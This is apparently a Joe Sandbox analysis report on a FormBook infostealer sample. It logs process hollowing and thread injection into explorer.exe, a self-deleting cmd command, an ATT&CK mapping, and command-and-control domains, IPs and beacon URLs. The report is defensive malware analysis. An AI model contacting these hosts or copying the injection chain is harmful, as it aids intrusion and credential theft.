Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A8927A mov eax, dword ptr fs:[00000030h]	9_2_04A8927A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B18A62 mov eax, dword ptr fs:[00000030h]	9_2_04B18A62

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 1_2_00409B30 LdrLoadDll,

1_2_00409B30

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.tubesing.com
Source: C:\Windows\explorer.exe	Domain query: www.wallacehills.com
Source: C:\Windows\explorer.exe	Domain query: www.attmleather.com
Source: C:\Windows\explorer.exe	Network Connect: 192.185.0.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.117.168.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.253.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.doxofcolor.com
Source: C:\Windows\explorer.exe	Domain query: www.nagpurmandarin.com
Source: C:\Windows\explorer.exe	Domain query: www.yonatec.com
Source: C:\Windows\explorer.exe	Network Connect: 52.54.92.195 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: DA0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: unknown protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 883008	Jump to behavior

.NET source code references suspicious native API functions

Source: jwRbEDUUZC.exe, A/cbd79d8ff5eebfd49749c1556753b349a.cs	Reference to suspicious API methods: ('cd76782d69a104f3f303c358a70cd0af4', 'GetProcAddress@kernel32.dll'), ('cb24f3dd7e02fcc5cad570d1bce45e35b', 'GetProcAddress@kernel32.dll'), ('c0e8f83e809aefd045dc2547656a87c47', 'GetProcAddress@kernel32.dll'), ('cd81a4f2ac5a86f5dd7a3097043d9c9b4', 'LoadLibrary@kernel32.dll'), ('c273e4fb38f457ca6291b5c099cea9380', 'GetProcAddress@kernel32.dll'), ('c6d263870c0b87b7acc8a2d95582dba51', 'GetProcAddress@kernel32.dll'), ('cff2412d8d7d420757fff39b246551495', 'GetProcAddress@kernel32.dll'), ('c0136ad2cb06a4a826500c305d82c8384', 'OpenProcess@kernel32.dll')
Source: 0.2.jwRbEDUUZC.exe.30000.0.unpack, A/cbd79d8ff5eebfd49749c1556753b349a.cs	Reference to suspicious API methods: ('cd76782d69a104f3f303c358a70cd0af4', 'GetProcAddress@kernel32.dll'), ('cb24f3dd7e02fcc5cad570d1bce45e35b', 'GetProcAddress@kernel32.dll'), ('c0e8f83e809aefd045dc2547656a87c47', 'GetProcAddress@kernel32.dll'), ('cd81a4f2ac5a86f5dd7a3097043d9c9b4', 'LoadLibrary@kernel32.dll'), ('c273e4fb38f457ca6291b5c099cea9380', 'GetProcAddress@kernel32.dll'), ('c6d263870c0b87b7acc8a2d95582dba51', 'GetProcAddress@kernel32.dll'), ('cff2412d8d7d420757fff39b246551495', 'GetProcAddress@kernel32.dll'), ('c0136ad2cb06a4a826500c305d82c8384', 'OpenProcess@kernel32.dll')
Source: 0.0.jwRbEDUUZC.exe.30000.0.unpack, A/cbd79d8ff5eebfd49749c1556753b349a.cs	Reference to suspicious API methods: ('cd76782d69a104f3f303c358a70cd0af4', 'GetProcAddress@kernel32.dll'), ('cb24f3dd7e02fcc5cad570d1bce45e35b', 'GetProcAddress@kernel32.dll'), ('c0e8f83e809aefd045dc2547656a87c47', 'GetProcAddress@kernel32.dll'), ('cd81a4f2ac5a86f5dd7a3097043d9c9b4', 'LoadLibrary@kernel32.dll'), ('c273e4fb38f457ca6291b5c099cea9380', 'GetProcAddress@kernel32.dll'), ('c6d263870c0b87b7acc8a2d95582dba51', 'GetProcAddress@kernel32.dll'), ('cff2412d8d7d420757fff39b246551495', 'GetProcAddress@kernel32.dll'), ('c0136ad2cb06a4a826500c305d82c8384', 'OpenProcess@kernel32.dll')

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread register set: target process: 3688			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Thread register set: target process: 3688			Jump to behavior

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"			Jump to behavior

Source: jwRbEDUUZC.exe, 00000000.00000002.373209526.00000000023D9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.377764821.000000000081C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.426904036.0000000000D70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: jwRbEDUUZC.exe, 00000000.00000002.373209526.00000000023D9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.426578221.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.426904036.0000000000D70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.426904036.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.406749120.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.378059101.0000000000D70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.426904036.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.406749120.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.378059101.0000000000D70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe

Queries volume information: C:\Users\user\Desktop\jwRbEDUUZC.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	812 Process Injection	1 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	812 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	112 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
jwRbEDUUZC.exe	68%	Virustotal		Browse
jwRbEDUUZC.exe	31%	Metadefender		Browse
jwRbEDUUZC.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.FormBook
jwRbEDUUZC.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.aspnet_compiler.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.jwRbEDUUZC.exe.30000.0.unpack	100%	Avira	HEUR/AGEN.1236402	Download File
1.0.aspnet_compiler.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.0.aspnet_compiler.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.0.jwRbEDUUZC.exe.30000.0.unpack	100%	Avira	HEUR/AGEN.1236402	Download File
1.0.aspnet_compiler.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.tubesing.com/ocgr/?5jm=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4aPYkPCWgKnca4quw==&q48d=SN6PFzMPJRoDS	100%	Avira URL Cloud	malware
https://2bsing.com/wp-admin/admin-ajax.php	0%	Avira URL Cloud	safe
http://2bsing.com/wp-includes/js/jquery/jquery.js	0%	Avira URL Cloud	safe
http://www.nagpurmandarin.com/ocgr/?5jm=sK8+WGPg2JRLe3fUQ4xa6L8WlFBJd5xCkWFiCNREvztrzLZiwMdrfToIj+s3oTo1GaSK+fkqdA==&q48d=SN6PFzMPJRoDS	100%	Avira URL Cloud	malware
http://2bsing.com/wp-content/plugins/bluehost-wordpress-plugin/images/icon-email.svg	0%	Avira URL Cloud	safe
http://2bsing.com/wp-content/plugins/bluehost-wordpress-plugin/static/images/cs-bluehost-bg.jpg	0%	Avira URL Cloud	safe
http://www.wallacehills.com/ocgr/?5jm=e/0Hm5WsGCZ9WAWS3m2jnNPZVvv73W2kM2wAvSWCn4dVzulK8Hz4WN5jVud3g/JTENNsBng/cw==&q48d=SN6PFzMPJRoDS	100%	Avira URL Cloud	malware
http://www.yonatec.com/ocgr/?q48d=SN6PFzMPJRoDS&5jm=tBqLR1P96jAoGzhM/bfMxIqpBnF4XdPQw9HD3GmR5P6T0l65+iRjfJ8EGOisALaFWgEX56fYJg==	0%	Avira URL Cloud	safe
www.mentalnayaarifmetika.online/ocgr/	100%	Avira URL Cloud	malware
http://www.attmleather.com/ocgr/?q48d=SN6PFzMPJRoDS&5jm=kiCgFP8+acxhLHZoy8gx31rwxGvurJ2lCG9zpi5owq94JNIuYWHK8T6MP/53pnYYpwC2n0A2jw==	100%	Avira URL Cloud	malware
https://2bsing.com/wp-login.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
td-ccm-168-233.wixdns.net	34.117.168.233	true	true	unknown
nagpurmandarin.com	34.102.136.180	true	false	unknown
www.wallacehills.com	52.54.92.195	true	true	unknown
tubesing.com	162.241.253.231	true	true	unknown
www.mentalnayaarifmetika.online	185.68.16.179	true	true	unknown
www.yonatec.com	192.185.0.218	true	true	unknown
www.tubesing.com	unknown	unknown	true	unknown
www.attmleather.com	unknown	unknown	true	unknown
www.doxofcolor.com	unknown	unknown	true	unknown
www.nagpurmandarin.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.tubesing.com/ocgr/?5jm=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4aPYkPCWgKnca4quw==&q48d=SN6PFzMPJRoDS	true	Avira URL Cloud: malware	unknown
http://www.nagpurmandarin.com/ocgr/?5jm=sK8+WGPg2JRLe3fUQ4xa6L8WlFBJd5xCkWFiCNREvztrzLZiwMdrfToIj+s3oTo1GaSK+fkqdA==&q48d=SN6PFzMPJRoDS	false	Avira URL Cloud: malware	unknown
http://www.wallacehills.com/ocgr/?5jm=e/0Hm5WsGCZ9WAWS3m2jnNPZVvv73W2kM2wAvSWCn4dVzulK8Hz4WN5jVud3g/JTENNsBng/cw==&q48d=SN6PFzMPJRoDS	true	Avira URL Cloud: malware	unknown
http://www.yonatec.com/ocgr/?q48d=SN6PFzMPJRoDS&5jm=tBqLR1P96jAoGzhM/bfMxIqpBnF4XdPQw9HD3GmR5P6T0l65+iRjfJ8EGOisALaFWgEX56fYJg==	true	Avira URL Cloud: safe	unknown
www.mentalnayaarifmetika.online/ocgr/	true	Avira URL Cloud: malware	low
http://www.attmleather.com/ocgr/?q48d=SN6PFzMPJRoDS&5jm=kiCgFP8+acxhLHZoy8gx31rwxGvurJ2lCG9zpi5owq94JNIuYWHK8T6MP/53pnYYpwC2n0A2jw==	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://2bsing.com/wp-admin/admin-ajax.php	cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://2bsing.com/wp-includes/js/jquery/jquery.js	cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://2bsing.com/wp-content/plugins/bluehost-wordpress-plugin/images/icon-email.svg	cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bluehost.com/wordpress	cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	false		high
https://my.bluehost.com/	cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	false		high
http://2bsing.com/wp-content/plugins/bluehost-wordpress-plugin/static/images/cs-bluehost-bg.jpg	cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://2bsing.com/wp-login.php	cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.54.92.195	www.wallacehills.com	United States	14618	AMAZON-AESUS	true
34.102.136.180	nagpurmandarin.com	United States	15169	GOOGLEUS	false
192.185.0.218	www.yonatec.com	United States	46606	UNIFIEDLAYER-AS-1US	true
34.117.168.233	td-ccm-168-233.wixdns.net	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	true
162.241.253.231	tubesing.com	United States	46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	633935
Start date and time: 25/05/202211:43:50	2022-05-25 11:43:50 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	jwRbEDUUZC (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@7/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 62% (good quality ratio 56.9%) Quality average: 71.6% Quality standard deviation: 31.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 93 Number of non-executed functions: 157
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 20.223.24.244
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
52.54.92.195	factura pendiente de pago pdf.exe	Get hash	malicious	Browse	www.despinaandcorealty.com/gqvv/?5jMt2HH=5W423H59go5oVxFcZ3UgCFEcj9GXwbRYj2Vz6nyO/87CLjoRDAceHd9oVOtPQPr6ZSAC8qQ4nQ==&Uzr=-ZKPP
	Pa5BQv8oni.exe	Get hash	malicious	Browse	www.wallacehills.com/ocgr/?7nLpl=e/0Hm5WsGCZ9WAWS3m2jnNPZVvv73W2kM2wAvSWCn4dVzulK8Hz4WN5jVtxNj+loH6s9&mZIt=uBzpjfYp
	ntrebare ES220062.xlsx	Get hash	malicious	Browse	www.wallacehills.com/ocgr/?ZL=o0D8QzKxA&cJE=e/0Hm5WpGFZ5WQae1m2jnNPZVvv73W2kM2oQzRKDjYdUzfJM7Xi0AJBhWIdx4eRbI75NYQ==
	8x6zeIBDXJ.exe	Get hash	malicious	Browse	www.wallacehills.com/ocgr/?2dcHhxHP=e/0Hm5WsGCZ9WAWS3m2jnNPZVvv73W2kM2wAvSWCn4dVzulK8Hz4WN5jVudO/OpQKbRrBng4PA==&e2=9r3HmbL8
	SecuriteInfo.com.W32.MSIL_Kryptik.GXM.genEldorado.9783.exe	Get hash	malicious	Browse	www.guidedmemoryjournals.com/bur5/?h2JPDNx=Fs0oYN4zKmIF0pm6PJgwXl0QH2Yby6kmkop1bL1mvRl6f9A29RrGGLrRqEj2Pjm4g+MA&e8t=fFN0xrBPFNXPKZFP
	BANKING_DETAILS.pdf.exe	Get hash	malicious	Browse	www.guidedmemoryjournals.com/bur5/?5j_Hvt=Fs0oYN4zKmIF0pm6PJgwXl0QH2Yby6kmkop1bL1mvRl6f9A29RrGGLrRqEj2Pjm4g+MA&X8OlGT=gJBhn4B0j24tyjt0
	59Slip_copy 0001 .pdf.exe	Get hash	malicious	Browse	www.reliabletrades.net/ch/
192.185.0.218	NCVPJzfa0w.exe	Get hash	malicious	Browse	www.yonatec.com/ocgr/?GJB=tBqLR1P96jAoGzhM/bfMxIqpBnF4XdPQw9HD3GmR5P6T0l65+iRjfJ8EGOiVf66GY2YQ56ffaQ==&Zdp8n=FHrl40h8H
	Shipping doc.xlsx	Get hash	malicious	Browse	www.hackworthcenter.net/goe8/?fvBh-0Dx=PjQFzuZh9jrDLF5+HDKyRd3fDto3uTJ1/yVB+4+o13lSGJFe06Qpth6cKdJ6tlm4zsNZkw==&Pl=jjDdzNaPmjLHxR
	Remittance_030822.exe	Get hash	malicious	Browse	www.tennistshirtz.com/u55j/?4hVDxZ=WMdwWNKkKsRrb8DMn3cbU/2ZTr8VfersCYnfLBpgNBF9g0F8CgsfbrUpJL8VpL5AtjZ8&t8=lN64a8l
	ORDER.exe	Get hash	malicious	Browse	www.centralshelfstorage.com/m80e/?xXqp=/nOOUeq4A8LP3kx59FsGs7V/fPwhwSDZviAHGWc5yfeFcdv7z4yAe8+TCnKQuvti2Hb4&8p9DCV=X48xfN5P
	OFFER 12575-11-2022_Xlxs.exe	Get hash	malicious	Browse	www.tennistshirtz.com/b23k/?wTbto8j=eIl4QmrzxHWy5t5lyKvuPUNrUHwVq7OexL6FqzPI4ZkDaJd4pcuitHQY6riwAG/tUQmd&8p=0fspZl
	9nM1eSsQgX.exe	Get hash	malicious	Browse	www.jefftbrooks.com/sbp5/?8p=Uzo+fQzAOpM4wINYdykmxUE8gr9R47FKqQ6QfyvjPbwDyb+4US1GFFAJvDREMs9IdLwz&2dvLWB=4hlx3pd844z
	DHL_RECEIPT.exe	Get hash	malicious	Browse	www.intensifylearning.com/n652/?3fVXBFN=vCE3bNt3Wo3PodFke/HKUIa3Du1GhSJBHfiznHZHrkX4d6c0nNgUr9yMGp9mErE0Gjqa&vPVpk=G2MtY4V8P62
	Invoice #00442811-20211029.exe	Get hash	malicious	Browse	www.pocketcarry.net/b4a0/?gHzpB=g0YcMAnXIZMerMQzYfGBcCJ5JgiM8JMUmlfd6RflOPT8YezHsO9n+uAiuqfnAUcpQoib&sR-tXb=E6whCr
	Payment_swift advice.exe	Get hash	malicious	Browse	www.testcarona.com/snr6/?4heDC=uo3jpgra5OjWh7sJM+aebJVpHSujVQgKNrxwa6HNVB4VtCrXEr/U3DGgwDaCJLJfY0XQ&_2=6lmDX2g0nN3lqTvp
	FzvFtf2XXK.exe	Get hash	malicious	Browse	www.hsvfingerprinting.com/b2c0/?7nwTnlOP=GBPyTIetQDYEnP95AB3ZP+TATXvEF0uNUplNLU+fJnXf4NL/NGXCk0UQ7SGq4zESqod4&x4KH=QfIpI
	jjBv8SpZXm.exe	Get hash	malicious	Browse	www.nolimitsrp.com/merc/?o67T=phtjLVfZMagppG0NPGMw/AOQEVAdR68zvdjxBFkWphQpJ6FLoIyti83d7z0BkjIecJAV&V8=VfRPdzpxb4pXml
	2WK7SGkGVZ.exe	Get hash	malicious	Browse	www.hsvfingerprinting.com/b2c0/?7nlpd=GBPyTIetQDYEnP95AB3ZP+TATXvEF0uNUplNLU+fJnXf4NL/NGXCk0UQ7SGq4zESqod4&_xllR=SL0l7NVxUdmdjv
